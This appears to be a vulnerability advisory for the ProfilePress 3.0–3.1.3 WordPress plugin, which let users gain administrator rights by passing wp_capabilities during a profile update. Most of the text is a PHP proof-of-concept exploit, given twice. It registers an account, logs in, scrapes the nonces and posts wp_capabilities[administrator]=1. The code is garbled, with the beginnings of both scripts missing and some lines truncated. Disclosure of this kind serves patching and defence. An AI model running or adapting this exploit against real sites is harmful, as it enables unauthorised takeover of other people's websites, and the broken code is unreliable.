ProfilePress 3.0 - 3.1.3 - Authenticated Privilege Escalation

The user profile update functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during a profile update which made it possible for users to escalate their privileges to that of an an administrator.

PoC

‘Hax0r3’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r3’, ‘reg_last_name’ => ‘hack’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); echo “Log in as newly created user”; $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘pp_ajax_login’, ‘data’ => ‘login_username=hax0r3&login;_password=password’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); //Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/account/edit-profile/’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); //Nonce preg_match(‘/“nonce”:“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; preg_match(‘/value=“Save Changes”> ‘Hax0r3’, ‘eup_email’ => ‘[email protected]’, ‘eup_first_name’ => ‘Hax0r3’, ‘eup_nickname’ => ‘Hax0r’, ‘eup_display_name’ => ‘Hax0r’, ‘eup_last_name’ => ‘hack’, ‘_wpnonce’ => $wpnonce, ‘nonce’ => $nonce, ‘ppmyac_form_action’ => ‘updateProfile’, ‘action’ => ‘pp_ajax_editprofile’, ‘is_melange’ => ‘true’, ‘wp_capabilities[administrator]’ => ‘1’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?> or ‘Hax0r3’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r3’, ‘reg_last_name’ => ‘hack’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); echo “Log in as newly created user”; $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘pp_ajax_login’, ‘data’ => ‘login_username=hax0r3&login;_password=password’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); //Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/account/edit-profile/’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); //Nonce preg_match(’/“nonce”:“([^”]+)"/‘, $content, $matches); $nonce = $matches[1]; preg_match(’/value=“Save Changes”> ‘Hax0r3’, ‘eup_email’ => ‘[email protected]’, ‘eup_first_name’ => ‘Hax0r3’, ‘eup_nickname’ => ‘Hax0r’, ‘eup_display_name’ => ‘Hax0r’, ‘eup_last_name’ => ‘hack’, ‘_wpnonce’ => $wpnonce, ‘nonce’ => $nonce, ‘ppmyac_form_action’ => ‘updateProfile’, ‘eup_submit’ => ‘1’, ‘is_melange’ => ‘true’, ‘wp_capabilities[administrator]’ => ‘1’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>